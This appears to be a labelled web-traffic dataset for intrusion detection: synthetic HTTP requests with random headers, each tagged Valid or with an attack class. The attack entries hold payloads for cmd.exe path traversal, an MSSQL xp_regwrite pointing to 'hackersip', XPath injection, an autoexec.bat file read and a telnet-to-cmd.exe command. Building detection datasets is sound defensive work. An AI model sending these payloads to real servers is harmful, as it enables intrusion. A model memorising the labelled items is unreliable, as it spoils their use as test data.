TE: trailers,trailers
Trailer: User-Agent
User-Agent: imeenoa/1.3
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: gVwbv/1.1
Warning: 534 45.179.228.107 "hsatu" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45673
Start - Id: 2128
class: Valid
GET /oirfynl2jgnmo/ayp11f8n/auhrHolirrhiudmg/Aharta9mjhnsofE6ao/t.-wZw-P.Vj1/cZVC6rF.CYuzNW/scriptlogbU988Nn0zYxterm/7xI.F-.0R3/axP.shtml?7kxyW=tee+nttYeB&oeeoh3u=eOuua+%26e8Oeame%27e1&ji=9810634418&siZafhutts5irc4=+ou+%3Cro8yEs&_IautoexecqmL.=htmiotoy5iTtee&oulibEot=icgetN9do2d+o HTTP/1.0
Host: 195.191.29.195:84
Connection: xeRo
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.1, hz-gb-2312, iso-8859-7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: e7Nbak1t=insSuigf
Client-ip: 237.9.247.14
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Mon, 29 Jun 09 09:40:08 UTC
ETag: "FAc2zi4siQ00_Em6CPV"
Expect: fi2eoiSe
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Fri, 30 Dec 05 10:06:33 CET
If-Unmodified-Since: Sat, 16 May 09 01:45:19 UTC
If-Match: "20wPQ_..QGC1t5-3"
If-None-Match: "JRZAfMeNWXKrS_21"
If-Range: Sun, 20 Sep 09 21:16:53 GMT
Max-Forwards: 5
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: otecM Thvuan=0stst
Range: 9797-
Referer: http://www.w3n7tn5t.be/qkHhjet/fnltpia/refruxn/elv8j/crsvaAf7.tar.gz
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/2.1 (X11; U; Linux i386 5.8; dh-r6; rv:5.9.8) Gecko/27253883
UA-CPU: MIPS
UA-Disp: 4115,383,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 539x1521
Via: 7.3 www.00wzrd.js:846
Transfer-Encoding: compress
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 9895241717803854226
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2128
Start - Id: 43992
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.ilnonoe5.biz:560
Connection: close
Accept: text/*;q=0.6
Accept-Charset: x-mac-cyrillic, utf-8;q=0.7
Accept-Encoding: compress, identity;q=0.5, gzip, deflate, deflate;q=0.0
Accept-Language: taiwpmz-ni, biEae-easr5ap, rie00hE-ttgkkje
Cache-Control: min-fresh=3
Client-ip: 1.54.57.193
Cookie: lictMeO=ns 
Cookie2: $Version="49"
Date: Mon, 23 Aug 04 06:57:42 CET
ETag: W/"KWt6cmpUGlB3N9ot-m-c"
Expect: 5titid9=sseu
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Sun, 06 Jan 08 14:36:50 GMT
If-Match: "MKSzTnWaX9MlBFD"
If-None-Match: *
If-Range: Wed, 05 Nov 08 24:06:37 CET
Max-Forwards: 6214
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aGR5YmlBdzphZG5zb3U=
Range: 29-,-5
Referer: /ndt1enHk/zhr62.php
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.8 (X11; U; Linux i386 0.2; ig-ew; rv:5.8.1) Gecko/34527599
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.1 www.trohA2sS.gif, ehd/3.6 250.138.35.59:99, ono4wp/7.1 www.edd8oooe.shtml
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: hri4/0.3, heuue/7.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43992
Start - Id: 17198
class: Valid
GET /rN0GlIaLY-JtzvcnR9e.shtml?aereeeKUlhhlni=ntveior4oc&rEgroup by2Le=210&to0a=07921&dtinutt=N%28&ee5nbfee=+9A&ieteo4sos=7918588 HTTP/1.0
Host: 96.134.29.158
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-age=27
Client-ip: 106.60.218.207
Cookie: llntAornavpiahn=at0oe;objectwinnt4Y3Pims1K0=o;ewlbdesdrt=4pf;5FvR7BP9x=tUShEdcb@5WE;rRFJd04=9moniSy
Cookie2: $Version="62"
Date: Thu, 31 May 07 24:37:03 GMT
ETag: W/"xQyy02MPibL3sH4"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Sun, 03 Oct 04 03:07:18 CET
If-Unmodified-Since: Sun, 09 Jan 05 18:46:29 UTC
If-Match: "yQ8ogSdbQfha37R"
If-None-Match: *
If-Range: "-VpQ1PzWeyX0zHr9qAF"
Max-Forwards: 000
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dRini wnbheet=snah
Authorization: Basic dGV5dDplYWVhamtUbA==
Range: 0907-97
Referer: http://relneR.com/iitnm7ag/homa/tiesle/owvted/41ts.php4
TE: gzip;q=0.3
Trailer: Max-Forwards
User-Agent: soeDvYpY http://www.vthuee.uk
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: HTTP/8.3 www.eorieeh.gif, HTTP/7.1 www.o9wedauh.css
Transfer-Encoding: compress
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 652 172.163.128.242:14057 "meiaHl" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17198
Start - Id: 48773
class: XPathInjection
GET /dgqreeednOpj5imm/RJgwXuSZ5hizXU.jpg?oabfc=770++++or+++1%3C+++++Ebe%2FuePitt%2Fieca%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D132%5D++++or+++4952%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&t342cl=podpduh910utdshu7&aU9coaobtestt=Tkurmnan&vRbody.K4=lubkii&eifgrieia=hgnc&o7tdjnnhyyo=brgobnisystem&QfwoP2@@K3=81874&eeoiddeemecs6r=533664&nsIinobMYF7=1 HTTP/1.0
Host: www.rlihaA4r.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-ce;q=0.3, iso-8859-8;q=0.8, utf-8;q=0.0, koi8-r, windows-1257
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: pj3cit='x'
Client-ip: 132.71.74.85
Cookie: toCe1tO=5141;neivmdonp7hncr=936;nedtddamitkZyoP=r;cntnegnkecer=478918;nsA=2 apd
Cookie2: $Version="67"
Date: Thu, 10 Aug 06 07:02:36 GMT
ETag: "h6tYXgqJNzILDSaXQQSG"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Wed, 19 Sep 07 20:36:50 CET
If-Unmodified-Since: Sat, 29 Jul 06 16:34:01 CET
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 7251
MIME-Version: 1.8
Pragma: 00='do9v'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Digest nc=6440203F
Range: -333764,-7
Referer: /pdXi4/0ib12M3n/ruaq/oans13/sedDalm.mdb
TE: trailers,trailers
Trailer: Trailer
User-Agent: e5pwraDztf (i2TJJUiN; eVeHIo4CbX)
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0640x829
Via: 1.6 www.tatea.html:26111
Transfer-Encoding: compress
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 178 131.107.128.102 "ir74fettml" "Sat, 10 Jul 04 12:45:47 GMT"
X-Forwarded-For: 160.70.37.175
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48773
Start - Id: 34965
class: Valid
PUT /ak.WRsoJ/@BitelnetArWXK/AEOg1/alaofBoagy.exe? HTTP/1.1
Content-Length: 217
Content-Language: rhrtnt
Content-Encoding: gzip
Content-Location: http://www.rairtEnn.be/edndeL/u6uat/Nfrn/ekore/AWs0.exe
Content-MD5: Y2lpcmlhZXJvYmVvbTd0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 03:34:18 CET
Last-Modified: Mon, 02 Jun 08 13:23:42 CET
Host: 75.83.191.24
Connection: close
Accept: text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.1, identity;q=0.4
Accept-Language: *
Cache-Control: ianegod='sIroksuJ'
Client-ip: 186.231.177.82
Cookie: egtk6Homdybee=3138;fgriy3ifHcStl=ooot;ehtbeyba=5;B5Y_X=0658;swhejcleE9=nfsE;U3oeyohgG9tCrli=ijr3ewinntexosh ry(ohA
Cookie2: $Version="2"
Date: Wed, 28 Jun 06 11:25:02 UTC
ETag: "INuV8pKCEwWu6gA8wE"
Expect: ogwo8ea
From: Jfon@lR0e.de
If-Modified-Since: Thu, 05 Oct 06 13:40:16 GMT
If-Unmodified-Since: Sun, 10 Sep 06 09:17:06 CET
If-Match: *
If-None-Match: *
If-Range: "HuBi3qEhrVaLIMNhnAbn"
Max-Forwards: 04
MIME-Version: 5.8
Pragma: 1ym=yUHnk9
Proxy-Authorization: pmzaie 9Isacsy=ohii35un
Authorization: Basic cklrczhhZGQ6ZWE1R3I2ZHM=
Range: 26302-,-510,4934-
Referer: /pp5d.tar.gz
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 1.5; Ua-im; rv:9.1.6) Gecko/55755645
UA-CPU: StrongARM
UA-Disp: 4391,758,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1780x097
Via: HTTP/0.4 1.54.232.123
Transfer-Encoding: deflate
Upgrade: hebtsm/1.8
Warning: 360 62.80.65.21 "urvcnetdenma" "Tue, 25 Sep 07 21:36:03 CET"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 755245432377424
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ismsrf1bi=1haWD&epiSepe2atTrhop=oboadse71xogot9sta&7eaa=n@ &eunotxpEndow=v342@&yotf=se6connectv/@etNo&hg6etptk7oSreog=13197075&6phusyo6dfy4h=tt&oynagrtiAeTw8=<erIS&sElStn=9&3iupd7te7od=gt=&3OonnutdyeI=5013

End - Id: 34965
Start - Id: 10675
class: Valid
GET /FemaTe/s2M0QfmYAyUS4-IlA/l669K.jpeg?vXXtzJyDpLqdocument=09&zxdXWPO7F0=r&rHrti=apsgaesnecrd&0rddloiOS=6107&d2e1leomtelf=538306688&rRobAbBeur=16796&Ig=cGRLdud&aaa2a=euojn&nytes6c=utoR&rBFTR@TO=5157443 HTTP/1.1
Host: 201.212.181.253
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: gmnhtruf-o, nbmaMAf-ob, d-1e;q=0.0
Cache-Control: max-age=04
Client-ip: 245.69.51.123
Cookie: sehn3sw3s0to=8366;meadcthshoerae=doe9ezohBhm6&hSl
Cookie2: $Version="066"
Date: Fri, 28 Aug 09 18:13:03 UTC
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Thu, 16 Dec 04 10:22:34 GMT
If-Unmodified-Since: Wed, 28 Mar 07 08:33:48 GMT
If-Match: *
If-None-Match: "BwfILPO5bSU.bU80cK"
If-Range: *
Max-Forwards: 6237
MIME-Version: 1.3
Pragma: 29iM2M=g7hmdo9
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: io4v8S 0eu8=rytdr
Range: 9268-2780
Referer: /Gos32sF/tnere.php3
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (compatible; Konqueror/6.4; SunOS sun4u; Eib0oci; 1bsasovfs)
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6678x842
Via: 6.6 144.167.5.142:2, FTP/9.2 www.4arsa1ih.tiff:6
Transfer-Encoding: h83rtu
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10675
Start - Id: 2961
class: Valid
GET /r2n7ib/l7YG_-2pyjqF_A/abOVsM6/gio/BTPzoo.K/ec2/Obehssb7.css? HTTP/1.1
Host: 134.52.233.203:80
Connection: keep-alive
Accept: text/xml;q=0.4, audio/*;q=0.8
Accept-Charset: iso-2022-kr, iso-8859-4, x-mac-cyrillic, iso-2022-kr
Accept-Encoding: identity;q=0.4, identity;q=0.0
Accept-Language: *
Cache-Control: 0Hjneiii=intgi
Client-ip: 27.132.127.51
Cookie: HvhKIDZt=sJ2Ve0o;-BKYfFGBDHm=<dlth;eUoiOwu=0er;re=uur@aaaac/r aautoexec
Cookie2: $Version="496"
Date: Fri, 25 Mar 05 20:37:57 CET
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: sinHgvS
From: Iohco@rBgrnzg.net
If-Modified-Since: Fri, 05 Aug 05 02:52:42 CET
If-Unmodified-Since: Thu, 12 Jan 06 09:48:10 CET
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: Wed, 02 Nov 05 09:31:17 GMT
Max-Forwards: 406
MIME-Version: 1.3
Pragma: httse=4EZGo
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: Digest response="BdD9bcBEfcb48D884C6dE1dDC64202D2"
Range: -6,9249-18
Referer: /vefmx/myiirtsy/oYncsp/tlUsb.jsp
TE: chunked
Trailer: Proxy-Authorization
User-Agent: eCkpkjorQ http://www.teuieura.fr
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8247x2505
Via: HTTP/6.3 www.tahht.tiff:6, HTTP/9.3 204.179.254.205:9
Transfer-Encoding: compress
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 679 121.176.212.56 "aajSEEaaS9ry" "Wed, 04 Oct 06 05:54:46 CET"
X-Forwarded-For: 230.76.229.166
X-Serial-Number: 1920071
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2961
Start - Id: 29025
class: Valid
GET /dndHpSeecl.gif?ydaElo=%40proRL&tv6d=ieorcum&icsrenr1=479&cwaa7p=0538&0oietvGReahaar=vBwDfuFaDsB&nse5snEwruc=5739&E1n0dino0p=oe5nn&nH=em3NGEGNx&oaeochiteo=ufwn&c6eotRmjomuppua=s%7Erk+&tasrGTeijaihk7=6689817 HTTP/1.1
Host: www.nonBy1eoic.de
Connection: close
Accept: video/*;q=0.6, image/*, text/*
Accept-Charset: isiri-3342;q=0.7, x-mac-chinesetrad;q=0.9
Accept-Encoding: compress;q=0.0, gzip;q=0.9, compress, gzip;q=0.7, gzip
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 213.215.107.144
Cookie: sgecoanD=w;irrlihiCitF=48spT0DN7;t6eP=b:system'h
Cookie2: $Version="6"
Date: Sun, 01 Oct 06 04:17:06 UTC
ETag: W/"6NzDXRyC4DsFsbjdKqy"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Mon, 11 Apr 05 12:44:34 GMT
If-Unmodified-Since: Tue, 13 Feb 07 21:22:01 GMT
If-Match: "7iA9dTsigIXu_YczqGm"
If-None-Match: "jKEPDUL5wYHfszpubFSV"
If-Range: "WdkA-ATYpKLnVCHlh"
Max-Forwards: 2443
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest response="E21B4c5C62eFD531a0d5E6C6B7D0CA9f"
Authorization: tpes7 nmEaSbr=sIn8btel
Range: 3-,5985-7558,753-
Referer: http://wejn2le.net/2Cls/bsdtu.conf
TE: deflate;q=0.4
Trailer: Connection
User-Agent: Mozilla/4.4 (compatible; nohuta; Open BSD i386; tMho; eertkelos; ngdyNTfi9t)
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: FTP/2.1 www.orb8Mr.css:682
Transfer-Encoding: deflate
Upgrade: hoyban/5.3, e7nm/6.7, idsix/6.8, nehEgh/3.6
Warning: 992 www.ntgo3cv.htm "seCcmng" "Wed, 13 Apr 05 13:20:02 CET"
X-Forwarded-For: 157.73.34.25
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29025
Start - Id: 9327
class: Valid
GET /rabgzxbderecomz8m/areXhUIv0qT-/jlseeeesemeueil.asp?yipiseesesox=0874&OKt4REzvNuUI=pI9&rcnIs=12584&ui=631&nCsgmnageeuetco=nasEps3Astrdwml&gchiotnsfd=078352&icj=rip&cdiztty=00446564&cyp=hxautoexectem4cGV%3C+open&tnmpdTn0ea9=oeNnhl8tooqtye6y HTTP/1.1
Host: www.nu6tehe.uk
Connection: close
Accept: audio/basic;q=0.5, text/*, image/*
Accept-Charset: euc-tw;q=0.8, euc-cn, windows-1254;q=0.2, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=43
Client-ip: 188.125.171.246
Cookie: tYliWposition= ew]wwstdino|;ae9tibjye=ewoaen4tDitothnoa
Cookie2: $Version="068"
Date: Thu, 31 Aug 06 09:54:30 CET
ETag: "EoKCZVJzOT0CrUv9L"
Expect: 100-continue
From: aorhle@n0oang.st
If-Modified-Since: Tue, 19 Jul 05 14:50:30 CET
If-Unmodified-Since: Mon, 17 Oct 05 09:22:39 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Jun 04 19:51:24 UTC
Max-Forwards: 8
MIME-Version: 5.7
Pragma: tedaif=ydno
Proxy-Authorization: agimi errEPr=aHaa
Authorization: Basic ZXI1cmtucjpjc29zbnI=
Range: -733,90130-
Referer: http://se4n.it/4eNtfese/esern0o/riop/ezrtsjt/rish.msf
TE: deflate,trailers
Trailer: Via
User-Agent: tKoN2Gq8L9 http://www.hoiOciQ.biz
UA-CPU: Sparc
UA-Disp: 8128,195,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 3.9 www.uanma.js, HTTP/1.2 www.haNp.htm:25766
Transfer-Encoding: compress
Upgrade: enhHu/9.9, 1see8/1.3
Warning: 040 www.ojuu.gif "ngtctI" "Thu, 08 Mar 07 22:46:35 CET"
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 14383442486
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9327
Start - Id: 3817
class: Valid
GET /wJz/Etp/rOue6l.XPPcIzX7s/ufp/du8pekle0n/mnsld.js?Dstdwueartoat=oDeieT&erheslw=8979684&sonr5tlel1xyh=sFhJ&aAwe2pesEns=nhfa&thber8aczrfe=hse9&Tx47s.y=z HTTP/1.0
Host: www.tmlfO.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ertiqtu-o;q=0.8, t-eva;q=0.1, o7idswa-oznbG
Cache-Control: only-if-cached
Client-ip: 70.158.123.20
Cookie: desoBinoisic=v';xaupaexiem3=YgI;7qahd=saaeelomig;5ae2pnq=rO
Cookie2: $Version="942"
Date: Wed, 31 Oct 07 12:04:47 UTC
ETag: "RsA-tek8X-B8YNLx"
Expect: 100-continue
From: r0oAr@svheb.cz
If-Modified-Since: Wed, 22 Dec 04 23:13:28 CET
If-Unmodified-Since: Sun, 03 Aug 08 12:59:27 GMT
If-Match: "tL@vXxpgtoVmd74Mgwse"
If-None-Match: *
If-Range: Mon, 02 Nov 09 07:18:25 GMT
Max-Forwards: 497
MIME-Version: 9.6
Pragma: see=hycyeON
Proxy-Authorization: Basic d3JsbW46d2RzM2FoNXI=
Authorization: NTLM c2lzZVJpcW1kbmxiaXRzZXJsbm5kb0FzZDF0YW50ZXVza3Nvdw==
Range: 81-,7-,210582-422
Referer: /3rout/hnetabe/hgio/3moajgtm.swf
TE: gzip,deflate,trailers
Trailer: User-Agent
User-Agent: etiaeus/0.9
UA-CPU: 68000
UA-Disp: 075,955,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7826x206
Via: HTTP/8.3 168.108.43.177, 0.2 www.Lr4hmbtn.jpeg, HTTP/9.6 88.104.235.196
Transfer-Encoding: gzip
Upgrade: tr4e/1.4, ntsu/9.3, heCo/5.1, aaa/5.7, te9o/9.8
Warning: 775 52.103.1.69 "g4nAihoalreq" "Sat, 14 Jun 08 11:58:45 UTC"
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 59223332390585
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 3817
Start - Id: 41092
class: SqlInjection
GET /6N9Qegoaeeit8asor/opCfQq/aPt/nbtinonahxte/a5oOgEPJOKr4/mhl/t0qtwJtAutsvj3/tq/a6Sirir.cgi?aEk0ge1trch=195083&XY9nzgT.aHL=i9okaiiTgdbSemnru&aiftl4thi4=eupdateoautoexec&xeted=65059704&sh4esmnthn=dm4siieagnrlteebi&_E2OaZ.OG@=6293&h8N=20&hF8eeynE=exec++xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27e3o5%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.0
Host: www.8metlEvhc4.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: macintosh, euc-cn, x-mac-ce
Accept-Encoding: 
Accept-Language: rrdEor-os, h-s5i;q=0.6
Cache-Control: max-age=3772
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="21"
Date: Mon, 24 Oct 05 07:45:10 CET
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Tue, 26 Apr 05 12:14:35 GMT
If-Unmodified-Since: Thu, 25 Jun 09 22:34:23 UTC
If-Match: "3TsI6EY@dmn7cJp"
If-None-Match: "P72PtUz1UrLbSy6"
If-Range: Thu, 14 Oct 04 02:04:03 UTC
Max-Forwards: 7
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: /ufcar/hoob/nuUs.cfm
TE: trailers,chunked;q=0.4
Trailer: User-Agent
User-Agent: e0Rx_Y http://www.dp8s2Z.com
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: deflate
Upgrade: tuems/4.8, nyAo/8.5, ytngoe/0.7, sai/1.7, 0eeagy/5.6
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41092
Start - Id: 45957
class: PathTransversal
GET /syrn/rt3kFWSqz/irte/s8lLd4qf1.jsp?teec59c=Or%29&enfiiAei=aaddc%40Aluyfromstdinrhaving&hrn=..%2F..%2F..%2FWINNT%2Fautoexec.bat&up7Nsr8ahje=hIN&aa1i=0304&nsMlnfweaoc=tHyT-_&hnt9eetpgiareqa=25426 HTTP/1.1
Host: 122.24.152.145
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 184.119.87.22
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="3"
Date: Thu, 26 Feb 04 09:38:36 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: Uhe1aed7@rRptioy.be
If-Modified-Since: Thu, 17 Jun 04 12:31:36 CET
If-Unmodified-Since: Fri, 08 Aug 08 16:53:23 GMT
If-Match: "s7A8_8u@rEF8DbdjO-6F"
If-None-Match: "wMeMHV06JvrX5ec"
If-Range: "V7.6KQuf0OitWReT.I"
Max-Forwards: 5777
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Range: -72
Referer: http://www.mecrtaka.biz/hssioya/6asvhv/hh6kkoa.cfm
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.1 (compatible; Ahyasb; Win98; tycwb; NpVrolps)
UA-CPU: x86
UA-Disp: 4049,587,8
UA-OS: FreeBSD
UA-Color: color8
Via: rno3u0/1.5 236.117.76.68
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45957
Start - Id: 42889
class: OsCommanding
GET /s31.mUzV9vR5hb5/umt7xls/KiSPisanntrc/lvsojsoCHi8eb/osdjsmtelze3hrro.shtml?atgN0rri=S&5autoexecPc=1159894&trNW.=54142&Osl9V=0128829&anaso=athrHdsmr2%27rdocumentpasswd9&ca=e5mztEAm6el6oe1ee3&cpexI=eFQvzTJa9jrX&6CkF=o6i&62eroO=e4fromm&liYfn=yzgu.&n9don6=yoQaAF&N6e@sock_streamntelnet=233.103.182.137%7Ccmd.exe+%2Fs HTTP/1.0
Host: 234.131.132.104:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, x-mac-icelandic
Accept-Encoding: gzip;q=0.3, identity, compress;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 96.55.27.134
Cookie: E6l9=ul;ncadmineerndtriro1;ssneouIw=xr4e;xsb3ie4e=0;ui=p%sor;r0xG3I6ox=mtt=a;leg2sdozgFIzaqi=ftp&
Cookie2: $Version="01"
Date: Tue, 18 Nov 08 09:25:08 UTC
ETag: W/"hxVAw7ycEWOOXXaqjbU"
Expect: tlgm
From: n2zse0bo@tibsA.uk
If-Modified-Since: Fri, 27 Feb 04 20:04:39 UTC
If-Unmodified-Since: Sun, 27 Jan 08 12:10:25 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 90
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: -057067,0-214264
Referer: http://www.o7tT.cz/nt6Tza/2o9k.css
TE: gzip;q=0.9,trailers,trailers
Trailer: Upgrade
User-Agent: nwmy (cQlyCG; c-P1Ny_; irhvuL3_m; o3mibts)
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4835x5695
Via: FTP/6.9 7.2.99.181
Transfer-Encoding: gzip
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------

null

End - Id: 42889
Start - Id: 2123
class: Valid
GET /qXo.iTkNzwzpSUafc/M4bueeii3ee/Ie/eni3ndatosbt4/DpTavar5/fify1a/o.oKXMO@gi5j.h/lE/nQG8_kzMkNmTY7/t3ufdW/xahe/oj.jsp? HTTP/1.1
Host: www.9moe4ksqte.it:80
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
